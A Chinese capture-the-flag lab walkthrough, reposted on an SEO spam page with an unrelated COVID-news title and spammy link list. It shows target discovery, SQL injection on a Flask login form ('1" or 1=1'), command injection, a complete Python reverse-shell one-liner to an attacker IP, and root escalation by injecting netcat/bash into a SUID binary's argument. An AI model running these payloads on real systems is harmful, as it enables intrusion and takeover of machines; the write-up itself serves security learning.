当前位置: 首页 > news >正文

长春疫情最新情况 最新消息苏州seo门户网

长春疫情最新情况 最新消息,苏州seo门户网,福州正规网站建设公司推荐,松江网站建设培训目录 信息搜集 WEB漏洞攻击 拿shell 信息搜集 首先ifconfig查看自己IP, netdiscover查看同网段下主机 第三个应该是目标靶机。用nmap查看靶机开放端口: 开放22和8080,看看8080开的啥服务 WEB漏洞攻击 看到让我们输入邀请码。有输入框的第…

目录

信息搜集

WEB漏洞攻击

拿shell


信息搜集

首先ifconfig查看自己IP,

netdiscover查看同网段下主机

第三个应该是目标靶机。用nmap查看靶机开放端口:

开放22和8080,看看8080开的啥服务

WEB漏洞攻击

看到让我们输入邀请码。有输入框的第一个反应是RCE,尝试几次后无果。后续测试SQL注入,发现在输入"时报错

Flask框架,最后一段报错信息直接看到搜索逻辑源码

输入其它内容时全部回显

推断布尔盲注,order by 尝试字段数

1" order by 1--+ 正常

1" order by 2--+ 报错

后续尝试

1" and left(version(),1)=5 --+

无果

直接万能密码开摆:

1" or 1=1 --+

emmmm,进来了

还是看看能否RCE

输入111|ls

拿shell

出了,弹个shell试试

cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.72",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

成了

看看文件权限

有一个ROOT文件,下面有它的C文件,读一下看看

发现程序定义了一个执行参数,如果程序在执行中不包含参数,则会打印出:

This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;

如果执行程序使用了参数,那么程序就会执行freshclam,运行病毒库更新

可以试试提权:

./update_cloudav "666 | nc 192.168.112.72 5555|/bin/bash|nc 192.168.112.72 6666"

拿到ROOT权限

http://www.qdjiajiao.com/news/1877.html

相关文章:

  • 商业网站的创建程序美工培训
  • 给网站做视频怎么赚钱seo具体seo怎么优化
  • 重庆哪里有做网站的公司百度投诉中心24人工客服
  • 陕西网站建设设计汕头网站设计公司
  • 成品网站制作公司seo是指搜索引擎优化
  • 垂直门户网站石家庄疫情防控最新政策
  • 做像百姓网这样网站多少钱长沙专业做网站公司
  • 企业做网站的方案合肥seo服务商
  • 做ppt模版的网站佛山seo优化
  • html5 手机端网站百度下载app下载安装
  • 北京南站地铁线路图seo排名优化推荐
  • 宝安网站制作哪里好抓取关键词的软件
  • 成都高端网站建设公司哪家好下载官方正版百度
  • 厦门网站优化服务腾讯中国联通
  • 成都免费网站制作seo推广百度百科
  • 温州网站建设策划方案软件工程培训机构哪家好
  • 高端品牌建站seo咨询服务
  • 网站权重优化方式成人教育培训机构排名
  • 什么网站做论坛签名优化教程网站推广排名
  • 个人怎么做微信公众号和微网站新手怎么引流推广推广引流
  • 做公众号的素材网站推广软件是什么工作
  • 郑州品牌网站建设百度热搜榜排名今日
  • 比较好的网站建设公司关键词竞价排名名词解释
  • 网站后台权限设计怎么在百度上做推广上首页
  • 网站推广工作如何做太原企业网站建设
  • 网站开发资金规模搜索推广代运营
  • 个人备案网站可以做淘宝客百度seo推广怎么收费
  • 手机做网站知乎艺人百度指数排行榜
  • 合肥高端网站建设公司长春网站建设设计
  • 百度推广 url主域名和注册网站不一致seo网站优化收藏